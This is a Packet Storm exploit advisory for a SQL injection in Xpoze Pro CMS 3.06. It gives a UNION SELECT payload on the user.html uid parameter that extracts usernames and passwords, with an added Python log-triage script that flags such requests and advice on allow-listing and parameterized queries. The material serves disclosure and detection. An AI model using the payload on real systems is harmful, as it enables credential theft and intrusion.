xpozepro-sql.txt

2008-07-10T00:00:00
ID PACKETSTORM:68014
Type packetstorm
Reporter HIva Team
Modified 2008-07-10T00:00:00

Description

`######################  
*^Hiva Digital Security Team^  
^HIva Team^  
######################  
*Script:  
Xpoze Pro CMS 2008  
XPOZE Pro 3.06 SQL Injection Exploit  
######################  
*Demo:  
http://demo.xpoze.org/  
######################  
*Authors:  
farenh3it, sn0wman  
######################  
*Exploit:  
  
/user.html?uid=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,concat(user,0x3a,pass),19,20,21,22,id,24,25,26,27,29,30,31,32,33+FROM+users+WHERE+id=1/*  
  
######################  
*Example:  
http://demo.xpoze.org/user.html?uid=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,concat(user,0x3a,pass),19,20,21,22,id,24,25,26,27,29,30,31,32,33+FROM+users+WHERE+id=1/*  
######################  
*Thanks to str0ke :X  
`
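
Added example (not part of the original advisory and not Xpoze code): a log triage check for requests like the one shown above, flagging any /user.html request whose uid is not a plain number once URL-encoding is undone. It assumes a legitimate uid is a short decimal id and that the server writes combined-format access logs; the sample lines are constructed and the function names are hypothetical.

```python
import re
from urllib.parse import urlsplit, parse_qs, unquote_plus

# Constructed sample access-log lines (combined log format), not real traffic.
SAMPLE_LOG = [
    '192.0.2.10 - - [10/Jul/2008:10:00:01 +0000] "GET /user.html?uid=42 HTTP/1.1" 200 5120',
    '192.0.2.77 - - [10/Jul/2008:10:00:05 +0000] "GET /user.html?uid=-1+union+select+1,2,3/* HTTP/1.1" 200 4011',
    '192.0.2.77 - - [10/Jul/2008:10:00:09 +0000] "GET /user.html?uid=7%2520UNION%2520SELECT%25201 HTTP/1.1" 200 3999',
    '192.0.2.12 - - [10/Jul/2008:10:00:12 +0000] "GET /index.html?uid=abc HTTP/1.1" 200 900',
    '192.0.2.13 - - [10/Jul/2008:10:00:15 +0000] "GET /user.html HTTP/1.1" 200 900',
]

REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
VALID_UID = re.compile(r"[0-9]{1,10}")  # assumption: uid is a short decimal id


def fully_decode(value, max_rounds=3):
    """Undo repeated URL-encoding so double-encoded values are inspected in clear."""
    for _ in range(max_rounds):
        decoded = unquote_plus(value)
        if decoded == value:
            break
        value = decoded
    return value


def suspicious_uid(line):
    """Return the decoded uid of a /user.html request if it is not numeric, else None."""
    match = REQUEST_RE.search(line)
    if not match:
        return None
    url = urlsplit(match.group(1))
    if url.path != "/user.html":
        return None
    # parse_qs decodes once; fully_decode handles any further encoding layers.
    for raw in parse_qs(url.query, keep_blank_values=True).get("uid", []):
        uid = fully_decode(raw)
        if not VALID_UID.fullmatch(uid):
            return uid
    return None


def triage(lines):
    """Return (client_ip, decoded_uid) for every flagged log line."""
    return [(line.split()[0], uid) for line in lines
            if (uid := suspicious_uid(line)) is not None]


if __name__ == "__main__":
    for client, uid in triage(SAMPLE_LOG):
        print(f"{client}\tuid={uid!r}")
```

The same allow-list (digits only) is the check the application should apply to uid before it reaches a query, together with a parameterized statement.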